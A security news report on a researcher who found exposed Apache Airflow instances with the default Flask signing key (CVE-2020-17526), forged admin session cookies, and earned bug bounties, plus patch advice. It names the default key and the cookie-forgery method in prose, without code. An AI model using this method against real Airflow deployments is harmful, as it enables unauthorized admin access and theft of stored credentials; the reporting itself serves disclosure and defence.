14 June 2021 at 15:55 UTC
Updated: 14 June 2021 at 20:18 UTC
$13,000 banked through scan and exploit attack methodology
Security researcher Ian Carroll has explained how he was able to exploit outdated Apache Airflow instances to find a series of vulnerabilities and collect more $13,000 in bug bounty payouts.
Apache Airflow offers a system for executing workflows, such as â€œcopying and transforming data between data sourcesâ€. The technology inherently features web-based interfaces connected to internal databases and other systems.
Catch up with the latest security research news
The security researcher automated scanning for outdated Apache Airflow instances vulnerable to the previously discovered CVE-2020-17526 vulnerability.
Airflowâ€™s web interface relies on Flaskâ€™s stateless, signed cookies to handle authentication data. The flaw arose because Airflow bundles a default signing key of temporary_key.
Using the flask-unsign tool, an attacker could browse an Airflow instanceâ€™s login pages, and capture an unauthenticated cookie before testing if an installation was vulnerable.
â€کSQLi as a serviceâ€™
By forging the user_id attribute in captured cookies it is possible to pose as an admin, opening the door to all kinds of exploits. For one thing, keys for AWS, payment processors, and databases will often be exposed to the web UI of vulnerable Airflow instances.
Carroll was able to use this process to identify a critical vulnerability in a transportation firmâ€™s infrastructure, earning a $4,500 bounty in the process. He later found other similarly vulnerable Airflow installations, earning him a total of $13,000 under HackerOne and Bugcrowd bug bounty programs.
The researcher noted: â€œSmarter companies quickly placed Airflow behind proxies such oauth2-proxy or Duo Network Gateway, which is a strong defense against authentication issues at the application level. I highly discourage exposing Airflow directly to the internet.â€
The process allowed him to uncover several critical issues in a number of bug bounty program.
Using the knowledge heâ€™d acquired, Carroll went on to discover lower severity flaws in Apache Airflow after setting up his own local environment.
CVE-2021-26559 â€“ the most severe of the two flaws uncovered by Carroll â€“ is a privilege elevation flaw involving the abuse of a captured signing key.
All the discussed vulnerabilities have been resolved with the latest version of the platform. Enterprises are urged to update to v1.10.15 or v2.0.2, a potential upgrade thatâ€™s particularly important for those running Airflow internally.
YOU MAY ALSO LIKE Android screen lock protection thwarted by Facebook Messenger Rooms exploit